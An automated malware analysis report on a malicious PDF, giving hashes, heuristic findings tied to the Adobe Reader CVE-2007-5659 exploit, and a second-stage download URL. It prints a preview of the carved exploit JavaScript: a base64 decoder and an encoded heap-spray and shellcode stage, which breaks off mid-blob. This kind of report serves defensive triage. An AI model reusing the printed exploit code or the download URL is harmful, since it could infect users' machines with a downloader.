PDF malware analysis — malicious · f256c7def3ca7dc7

MALICIOUS

PDF

3.0 KB First seen: 2012-07-12

MD5: 1fd36d03de22f6afab768ff030284b36 SHA-1: ee5a87ea40504a5411897ebdd86428662e92939b SHA-256: f256c7def3ca7dc7cb8a99f2259a06fa01350d8c4f200d92d1313250c758c8fc

276 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 Command and Scripting Interpreter: PowerShell T1059.003 Command and Scripting Interpreter: Windows Command Shell

The PDF contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript, found in 'javascript_obj0009_000.js', is likely responsible for executing the malicious payload. The exact actions of the script could not be determined due to obfuscation, but its presence within a highly suspicious PDF points to a malicious intent, likely to download and execute further stages.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 8

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
```
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://herosima1yet00g.cn/myexp/getexe.php?spl=pdf_exp Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js`	pdf-javascript-stream	PDF /JS object 9 at offset 0xD6	20833 bytes
SHA-256: `75916600b6be2c16f6e7e1400da3faa16e34223b0521427dd09f74c9f73ff5c6`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode64(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = keyXXXStr.indexOf(input.charAt(i++)); enc2 = keyXXXStr.indexOf(input.charAt(i++)); enc3 = keyXXXStr.indexOf(input.charAt(i++)); enc4 = keyXXXStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) \| (enc2 >> 4); chr2 = ((enc2 & 15) << 4) \| (enc3 >> 2); chr3 = ((enc3 & 3) << 6) \| enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while (i < input.length); return output; } var aasd = decode64("CiB2YXIgbEwwcVFIRG1yID0gbmV3IEFycmF5KCk7CiB2YXIgSUJHS2pmSHc5OwogdmFyIGxhdmUgPSBldmFsOwogIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU2YyU0YyU0YyU1NiU1MCUzOSUzMCUzNiU2NCUyOCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyYyUyMCU2ZSU3NyU1MCU3MCU2NSU2MiUzNiU3YSU0YiUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUyMCUzYyUyMCU2ZSU3NyU1MCU3MCU2NSU2MiUzNiU3YSU0YiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyMCUyYiUzZCUyMCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyMCUzZCUyMCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyZSU3MyU3NSU2MiU3MyU3NCU3MiU2OSU2ZSU2NyUyOCUzMCUyYyUyMCU2ZSU3NyU1MCU3MCU2NSU2MiUzNiU3YSU0YiUyMCUyZiUyMCUzMiUyOSUzYiUyMCUyMCUyMCUyMCU3MiU2NSU3NCU3NSU3MiU2ZSUyMCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUzYiUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU1NSU0NyU0OCU3NCU1MSU2MyU0NiU3NyUzMyUyOCU0NiUzNiUzOCUzMiU3MCU1YSU3NCU0YyU1MiUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU2OSU2NiUyOCU0NiUzNiUzOCUzMiU3MCU1YSU3NCU0YyU1MiUyMCUzZCUzZCUyMCUzMCUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2ZSUzMiU0MSU2YSU3YSUzOCUzMCU3MCU2YyUyMCUzZCUyMCUzMCU3OCUzMCU2MyUzMCU2MyUzMCU2MyUzMCU2MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MSU3NiU2YyUzNyU2NyUzMyU0ZSU2MSU1MyUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNiUzOCUzMiU0NiUyNSU3NSUzNyUzMiUzNiUzNSUyNSU3NSUzNyUzMyUzNiU0NiUyNSU3NSUzNiU0NCUzNiUzOSUyNSU3NSUzMyUzMSUzNiUzMSUyNSU3NSUzNiUzNSUzNyUzOSUyNSU3NSUzMyUzMCUzNyUzNCUyNSU3NSUzNiUzNyUzMyUzMCUyNSU3NSUzNiUzMyUzMiU0NSUyNSU3NSUzMiU0NiUzNiU0NSUyNSU3NSUzNyUzOSUzNiU0NCUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzMiU0NiUzNyUzMCUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCU2OSU2NiUyOCU0NiUzNiUzOCUzMiU3MCU1YSU3NCU0YyU1MiUyMCUzZCUzZCUyMCUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU2ZSUzMiU0MSU2YSU3YSUzOCUzMCU3MCU2YyUyMCUzZCUyMCUzMCU3OCUzMyUzMCUzMyUzMCUzMyUzMCUzMyUzMCUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MSU3NiU2YyUzNyU2NyUzMyU0ZSU2MSU1MyUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNiUzOCUzMiU0NiUyNSU3NSUzNyUzMiUzNiUzNSUyNSU3NSUzNyUzMyUzNiU0NiUyNSU3NSUzNiU0NCUzNiUzOSUyNSU3NSUzMyUzMSUzNiUzMSUyNSU3NSUzNiUzNSUzNyUzOSUyNSU3NSUzMyUzMCUzNyUzNCUyNSU3NSUzNiUzNyUzMyUzMCUyNSU3NSUzNiUzMyUzMiU0NSUyNSU3NSUzMiU0NiUzNiU0NSUyNSU3NSUzNyUzOSUzNiU0NCUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzMiU0NiUzNyUzMCUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCU2OSU2NiUyOCU0NiUzNiUzOCUzMiU3MCU1YSU3NCU0YyU1MiUyMCUzZCUzZCUyMCUzMiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MSU3NiU2YyUzNyU2NyUzMyU0ZSU2MSU1MyUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNiUzOCUzMiU0NiUyNSU3NSUzNyUzMiUzNiUzNSUyNSU3NSUzNyUzMyUzNiU0NiUyNSU3NSUzNiU0NCUzNiUzOSUyNSU3NSUzMyUzMSUzNiUzMSUyNSU3NSUzNiUzNSUzNyUzOSUyNSU3NSUzMyUzMCUzNyUzNCUyNSU3NSUzNiUzNyUzMyUzMCUyNSU3NSUzNiUzMyUzMiU0NSUyNSU3NSUzMiU0NiUzNiU0NSUyNSU3NSUzNyUzOSUzNiU0NCUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzMiU0NiUzNyUzMCUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2YyU3MCU1MCUzMyU0NSU1NiUzMCU0NyU0YiUyMCUzZCUyMCUzMCU3OCUzNCUzMCUzMCUzMCUzMCUzMCUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1OCUzMCU2NyU0MSU0NiU2OCU0YiU3YSU2OCUyMCUzZCUyMCU0MSU3NiU2YyUzNyU2NyUzMyU0ZSU2MSU1MyUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2ZSU3NyU1MCU3MCU2NSU2MiUzNiU3YSU0YiUyMCUzZCUyMCU2YyU3MCU1MCUzMyU0NSU1NiUzMCU0NyU0YiUyMCUyZCUyMCUyOCU1OCUzMCU2NyU0MSU0NiU2OCU0YiU3YSU2OCUyMCUyYiUyMCUzMCU3OCUzMyUz